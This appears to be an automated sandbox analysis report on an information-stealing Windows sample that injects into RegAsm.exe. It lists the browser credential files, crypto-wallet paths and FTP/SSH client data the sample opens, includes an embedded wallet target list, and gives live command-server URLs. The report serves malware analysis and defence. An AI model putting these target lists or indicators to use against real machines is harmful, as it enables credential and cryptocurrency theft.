                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D51C0
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D5242
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006D5303
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_006D53B0
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006D5697
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006D580A
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006D5951
                      Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_006D5A53
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,0_2_006769B1
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_0064F2B5
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006C363F
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_006C382E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FD2C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C43D7 GetSystemTimeAsFileTime,0_2_006C43D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC12 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FC12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCD9 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FCD9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C928390 NSS_GetVersion,2_2_6C928390
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: window-state.json
                      Source: RegAsm.exe String found in binary or memory: \Exodus\
                      Source: RegAsm.exe String found in binary or memory: Exodus
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: \\config\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: Yara match File source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Source: Yara match File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: file.exe PID: 2520, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C9E0C40 sqlite3_bind_zeroblob,2_2_6C9E0C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C9E0D60 sqlite3_bind_parameter_name,2_2_6C9E0D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C908EA0 sqlite3_clear_bindings,2_2_6C908EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C9E0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6C9E0B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C906410 bind,WSAGetLastError,2_2_6C906410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C9060B0 listen,WSAGetLastError,2_2_6C9060B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C90C030 sqlite3_bind_parameter_count,2_2_6C90C030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C90C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6C90C050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C906070 PR_Listen,2_2_6C906070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C8922D0 sqlite3_bind_blob,2_2_6C8922D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C9063C0 PR_Bind,2_2_6C9063C0
                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                      Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                      Privilege Escalation: 1 DLL Side-Loading; 511 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                      Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 1 Virtualization/Sandbox Evasion; 511 Process Injection; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
                      Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                      Discovery: 2 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 56 System Information Discovery; 1 Network Share Discovery; 141 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 System Owner/User Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                      Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Screen Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                      Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph
                      Behavior Graph ID: 1440170, Sample: file.exe, Startdate: 12/05/2024, Architecture: WINDOWS, Score: 100

                      Top level:
                        DNS/IP: steamcommunity.com
                        Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
                        Started: file.exe

                      file.exe:
                        Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                        Started: RegAsm.exe; conhost.exe

                      RegAsm.exe:
                        DNS/IP: 65.109.242.112, 443, 49731, 49732 ALABANZA-BALTUS United States
                        DNS/IP: steamcommunity.com 23.195.238.96, 443, 49730 AKAMAI-ASUS United States
                        Dropped: C:\Users\user\AppData\...\vcruntime140[1].dll, PE32
                        Dropped: C:\Users\user\AppData\...\softokn3[1].dll, PE32
                        Dropped: C:\Users\user\AppData\Local\...\nss3[1].dll, PE32
                        Dropped: 10 other files (none is malicious)
                        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 6 other signatures
                        Started: cmd.exe

                      cmd.exe:
                        Started: conhost.exe; timeout.exe

                      Source | Detection | Scanner | Label | Link
                      file.exe | 100% | Avira | HEUR/AGEN.1318539 |
                      file.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\ProgramData\BGDAAKJJDAAK\freebl3.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\freebl3.dll | 0% | Virustotal | | Browse
                      C:\ProgramData\BGDAAKJJDAAK\mozglue.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\mozglue.dll | 0% | Virustotal | | Browse
                      C:\ProgramData\BGDAAKJJDAAK\msvcp140.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\msvcp140.dll | 0% | Virustotal | | Browse
                      C:\ProgramData\BGDAAKJJDAAK\nss3.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\nss3.dll | 0% | Virustotal | | Browse
                      C:\ProgramData\BGDAAKJJDAAK\softokn3.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\softokn3.dll | 0% | Virustotal | | Browse
                      C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll | 0% | ReversingLabs | |
                      C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 1% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | Virustotal | | Browse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | Virustotal | | Browse
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | 0% | URL Reputation | safe |
                      https://mozilla.org0/ | 0% | URL Reputation | safe |
                      https://mozilla.org0/ | 0% | URL Reputation | safe |
                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | 0% | URL Reputation | safe |
                      https://65.109.242.112/freebl3.dllo | 0% | Avira URL Cloud | safe |
                      http://store.st | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/nss3.dllMsi | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/softokn3.dllM | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/msvcp140.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/freebl3.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112 | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/vcruntime140.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/sqlx.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/ | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/softokn3.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112HJJ | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/mozglue.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/mozglue.dlle | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112 | 12% | Virustotal | | Browse
                      https://65.109.242.112/ | 12% | Virustotal | | Browse
                      https://65.109.242.112/p | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/nss3.dll | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112JDG | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/# | 0% | Avira URL Cloud | safe |
                      https://65.109.242.112/sqlx.dll | 11% | Virustotal | | Browse
                      https://65.109.242.112/# | 12% | Virustotal | | Browse
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      steamcommunity.com | 23.195.238.96 | true | false | | high

                      Name | Malicious | Antivirus Detection | Reputation
                      https://65.109.242.112/msvcp140.dll | false | Avira URL Cloud: safe | unknown
                      https://65.109.242.112/freebl3.dll | false | Avira URL Cloud: safe | unknown
                      https://65.109.242.112/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
                      https://65.109.242.112/sqlx.dll | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                      https://65.109.242.112/ | false | 12%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                      https://65.109.242.112/softokn3.dll | false | Avira URL Cloud: safe | unknown
                      https://65.109.242.112/mozglue.dll | false | Avira URL Cloud: safe | unknown
                      https://65.109.242.112/nss3.dll | false | Avira URL Cloud: safe | unknown
                      https://steamcommunity.com/profiles/76561199681720597 | false | | high
                      Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/about/76561199681720597[1].htm.2.drfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFAEHIEC.2.drfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/profiles/76561199681720597eLRegAsm.exe, 00000002.00000002.2171023727.0000000000F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                              high
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EBAFBG.2.drfalse
                                                                                                                                high
                                                                                                                                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://65.109.242.112HJJRegAsm.exe, 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://65.109.242.112/mozglue.dlleRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                            high
